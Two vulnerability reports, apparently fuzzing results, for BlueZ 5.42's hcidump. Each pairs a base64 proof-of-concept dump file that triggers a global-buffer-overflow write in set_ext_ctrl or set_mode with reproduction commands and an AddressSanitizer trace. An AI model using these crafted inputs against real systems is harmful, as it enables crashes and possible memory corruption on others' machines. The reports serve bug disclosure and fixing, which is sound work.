Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An buffer overflow was observed in "set_ext_ctrl" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IAAKABAAAKKAABU0AgAAA+gXAAEABf9WAAAAIAICNwcABwICNwcCAjcHACCAKhU0AgIAAAMXAAEA Bf//////IK+vr6+vr6+vr6+vr6+vr6+vr6+np6enp6enp6enp6enp6enp6enp6enp6enp6enp29v b29vb29vb29vb29vb29vb29vb4AAAQAWPk0+WBr/gAD2BAEAEj4+AQAAALoAAwQBABA+Pj5YAAEf AA7mAQA+CAQSPj4+WBo1utgDBAEAEj4+PUI6Pro= Affected code: 225 static void set_ext_ctrl(int in, uint16_t handle, uint16_t cid, 226 uint8_t ext_ctrl) 227 { 228 register cid_info *table = cid_table[in]; 229 register int i; 230 231 for (i = 0; i < CID_TABLE_SIZE; i++) 232 if (table[i].handle == handle && table[i].cid == cid) 233 table[i].ext_ctrl = ext_ctrl; 234 } 235 Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==29005==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000830251 at pc 0x48d708 bp 0x7b4d8ac14f70 sp 0x7b4d8ac14f68 WRITE of size 1 at 0x000000830251 thread T0 #0 0x48d707 in set_ext_ctrl tools/parser/l2cap.c:233 #1 0x48d707 in conf_opt tools/parser/l2cap.c:691 #2 0x498a05 in conf_rsp tools/parser/l2cap.c:781 #3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256 #4 0x479c9c in acl_dump tools/parser/hci.c:4041 #5 0x479c9c in hci_dump tools/parser/hci.c:4120 #6 0x4035d4 in parse tools/parser/parser.h:260 #7 0x4035d4 in read_dump tools/hcidump.c:425 #8 0x4035d4 in main tools/hcidump.c:810 #9 0x6d210d1b7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x000000830251 is located 1 bytes to the right of global variable 'frame_table' from 'tools/parser/sdp.c' (0x82ff80) of size 720 SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:233 set_ext_ctrl Shadow bytes around the buggy address: 0x0000800fdff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0000800fe040: 00 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9 0x0000800fe050: 00 00 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 0x0000800fe060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==29005==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An buffer overflow was observed in "set_mode" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: LQAABP8EDEgAtSy2BA7/AAEQEJABgDIAAAAD6LcaAAEGhwH//39vlgAAAQABAAA9PggAav8HAD4+ IABF2RlAAKKA0xU0AgAAAAEXAAEABf9WAAAAIBkCAAEQAAAANPVq/wcAPj4gACneGUAAooDTFTQC AAAAARcAAQAF/1YAAAAgGQIAARAAAAA09fECFw4CAAEAAH8VAADeAAAAAEABANM9PggAgP8HAD4+ IAAp+BlAAKKA0xU0AgAA8wEyAAEABf9WAAAAIBkCAAEQAAAANPXxAhcOAgABAAB/FQAAAAAAAABA AQDTPT4IAID/BwA+PiAAKfgZQACigNMVNAIAGgDTPT4IAID/BwA+PiAAKfgAAW+WAAABAAEAAD0+ CABq/wcAPj4gACnZGUAAooDTFTQCAAAAARcAAQAF/1YAAADeGUAAooDTFTQCAAA= Affected code: 204 static void set_mode(int in, uint16_t handle, uint16_t cid, uint8_t mode) 205 { 206 register cid_info *table = cid_table[in]; 207 register int i; 208 209 for (i = 0; i < CID_TABLE_SIZE; i++) 210 if (table[i].handle == handle && table[i].cid == cid) 211 table[i].mode = mode; 212 } 213 Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==29456==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000833090 at pc 0x48d41c bp 0x7b8662e79fa0 sp 0x7b8662e79f98 WRITE of size 1 at 0x000000833090 thread T0 #0 0x48d41b in set_mode tools/parser/l2cap.c:211 #1 0x48d41b in conf_opt tools/parser/l2cap.c:657 #2 0x498a05 in conf_rsp tools/parser/l2cap.c:781 #3 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256 #4 0x479c9c in acl_dump tools/parser/hci.c:4041 #5 0x479c9c in hci_dump tools/parser/hci.c:4120 #6 0x4035d4 in parse tools/parser/parser.h:260 #7 0x4035d4 in read_dump tools/hcidump.c:425 #8 0x4035d4 in main tools/hcidump.c:810 #9 0x7af38a9c4b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x000000833090 is located 0 bytes to the right of global variable 'table' from 'tools/parser/cmtp.c' (0x830340) of size 11600 SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/l2cap.c:211 set_mode Shadow bytes around the buggy address: 0x0000800fe5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe5d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe5f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0000800fe610: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0000800fe620: 00 00 00 00 00 00 00 00 00 00 00 00 01 f9 f9 f9 0x0000800fe630: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 0x0000800fe640: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800fe650: 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 0x0000800fe660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==29456==ABORTING
